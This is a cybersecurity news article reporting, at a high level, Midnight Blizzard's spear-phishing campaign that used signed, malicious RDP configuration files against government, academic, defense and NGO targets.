Massive Midnight Blizzard Phishing Attack Strikes with Weaponized RDP Files

There is an ongoing, targeted spear-phishing attack by Russian threat actor Midnight Blizzard aimed at government, academia, and other sectors, which, likely for intelligence gathering, highlights the persistent threat of sophisticated cyber operations.

A spear-phishing campaign targeting multiple organizations deployed RDP configuration files disguised as legitimate messages from Microsoft, where these files redirected victims to a malicious server controlled by the attacker.

Midnight Blizzard has employed a novel access vector, a signed RDP configuration file, to compromise targets’ devices, which overlaps with UAC-0215 and similar incidents reported by Amazon.

It is a Russian SVR-linked threat actor that targets governments, diplomatic entities, NGOs, and IT service providers in the US and Europe by using sophisticated techniques to compromise accounts and authentication mechanisms, enabling long-term intelligence gathering since 2018.

APT29, a persistent threat actor, leverages diverse techniques like phishing, stolen credentials, and supply chain attacks to gain initial access, often targeting AD FS with FOGGYWEB and MAGICWEB malware.

Microsoft has detected and is actively notifying targeted customers of nation-state cyberattacks and has provided security measures, including IOCs, hunting queries, and detection details, to aid in mitigating this threat.

A targeted phishing campaign using RDP configuration files, where the attackers, Midnight Blizzard, sent highly targeted emails to thousands of users, leveraging social engineering tactics related to Microsoft, AWS, and Zero Trust to trick victims into downloading and executing malicious RDP files.

Malicious remote connection

The malicious RDP attachment compromised target systems, allowing bidirectional access to sensitive resources like hard drives, clipboards, printers, and authentication credentials, which enabled malware installation, RAT deployment, and potential credential exposure.

The connection exposed sensitive target system information, including file systems, network drives, peripherals, authentication credentials, clipboard data, and POS devices, enabling potential data exfiltration and unauthorized system access.

It has been observed that Midnight Blizzard phishing campaigns target specific sectors like government, education, defense, and NGOs in several countries, notably the UK, Europe, Australia, and Japan.

It also leveraged previously compromised legitimate organizations’ email addresses to send phishing emails, utilizing domains listed in the IOC section to execute their malicious campaign.

Also Read:

Kaaviya
Kaaviyahttps://cyberpress.org/
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She is covering various cyber security incidents happening in the Cyber Space.

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here